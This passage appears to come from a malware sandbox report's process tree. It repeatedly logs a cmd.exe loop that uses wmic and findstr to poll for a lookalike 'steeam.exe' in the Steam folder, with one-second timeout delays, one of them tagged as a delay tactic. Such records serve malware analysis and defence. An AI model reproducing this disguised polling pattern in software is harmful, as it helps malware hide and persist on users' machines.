C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3996

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:68

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3660

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3048

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:212

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1044

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4360

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:344

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4436

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2756

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4060

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2712

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4208

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2988

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3524

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1444

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4024

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5040

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1644

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3660

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1216

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2920

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4152

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2736

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1464

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3872

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4032

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1884

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3856

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1592

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:664

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4392

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:592

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2164

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2880

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4024

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3652

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4380

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5028

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:620

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:316

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4152

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4348

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2616

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4928

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3040

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2676

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2320

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1632

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:60

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4604

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:356

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3640

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2696

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:68

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:200

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3660

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3700

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3268

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3484

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5100

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1108

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4668

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3432

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4680

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:644

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:964

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3668

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3980

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3940

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1568

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2880

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2156

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2860

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1216

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:216

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:828

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3624

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1376

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4668

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3628

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1592

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3452

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:664

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:60

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4136

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3444

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2184

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1056

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1844

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1172

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1300

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4152

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1704

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4236

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1652

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3040

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1516

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4144

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2800

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4028

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3760

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4120

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5024

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1020

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3928

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1048

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4916

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:200

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2108

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4996

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2592

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3700

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4236

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5100

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2796

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4144

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:32

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:708

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3296

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2988

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:212

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:500

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1564

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:308

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:700

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3636

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1300

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3360

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4320

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3468

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2712

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4240

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4232

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4208

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4572

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2696

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3432

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4460

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1320

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:356

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4024

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:524

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4916

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4932

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4436

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3392

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3884

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1060

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3868

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4524

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2024

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1592

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4348

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3296

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2800

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3452

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:344

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3940

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2960

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1636

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1216

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:316

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1300

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3360

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5064

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4884

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:656

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1884

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2988

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:664

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4680

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1052

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3444

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3984

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5024

C:\Windows\system32\cmd.exe
